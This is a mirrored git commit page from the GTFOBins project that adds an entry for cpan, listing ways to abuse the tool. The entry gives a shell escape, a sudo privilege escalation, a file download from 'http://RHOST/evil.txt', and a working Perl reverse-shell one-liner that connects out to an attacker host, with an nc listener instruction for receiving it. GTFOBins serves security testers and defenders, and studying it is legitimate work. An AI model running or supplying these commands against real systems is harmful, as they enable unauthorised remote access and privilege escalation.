mirror of
https://github.com/GTFOBins/GTFOBins.github.io
synced 2024-12-26 06:49:44 +01:00
Add cpan
This commit is contained in:
Shaksham Jaiswal
Emilio
parent
81b87f033e
commit
b3a6e93b78
33
_gtfobins/cpan.md
Normal file
33
_gtfobins/cpan.md
Normal file
@ -0,0 +1,33 @@
|
|||||||
|
---
|
||||||
|
functions:
|
||||||
|
shell:
|
||||||
|
- description: cpan lets you execute perl commands with `! command`
|
||||||
|
code: |
|
||||||
|
$ cpan
|
||||||
|
cpan[1]> ! exec '/bin/bash'
|
||||||
|
|
||||||
|
reverse-shell:
|
||||||
|
- description: Run ``nc -lvp RPORT`` on the attacker box to receive the shell.
|
||||||
|
code: |
|
||||||
|
$ cpan
|
||||||
|
cpan[1]> ! use Socket; my $i="RHOST"; my $p=RPORT; socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp")); if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S"); open(STDOUT,">&S"); open(STDERR,">&S"); exec("/bin/sh -i");};
|
||||||
|
|
||||||
|
file-upload:
|
||||||
|
- description: Serve files in the local folder running an HTTP server on port 8080. Install dependency via `cpan HTTP::Server::Simple`.
|
||||||
|
code: |
|
||||||
|
$ cpan
|
||||||
|
cpan[1]> ! cpan[1]> ! use HTTP::Server::Simple; my $server= HTTP::Server::Simple->new(); $server->run();
|
||||||
|
|
||||||
|
file-download:
|
||||||
|
- description: Fetch a remote file via HTTP GET request and store it in PWD.
|
||||||
|
code: |
|
||||||
|
$ cpan
|
||||||
|
cpan[1]> ! use File::Fetch; my $file = (File::Fetch->new(uri => 'http://RHOST/evil.txt'))->fetch();
|
||||||
|
|
||||||
|
sudo:
|
||||||
|
- code: |
|
||||||
|
$ sudo cpan
|
||||||
|
cpan[1]> ! exec '/bin/bash'
|
||||||
|
|
||||||
|
---
|
||||||
|
|
||||||
Loading…
Reference in New Issue
Block a user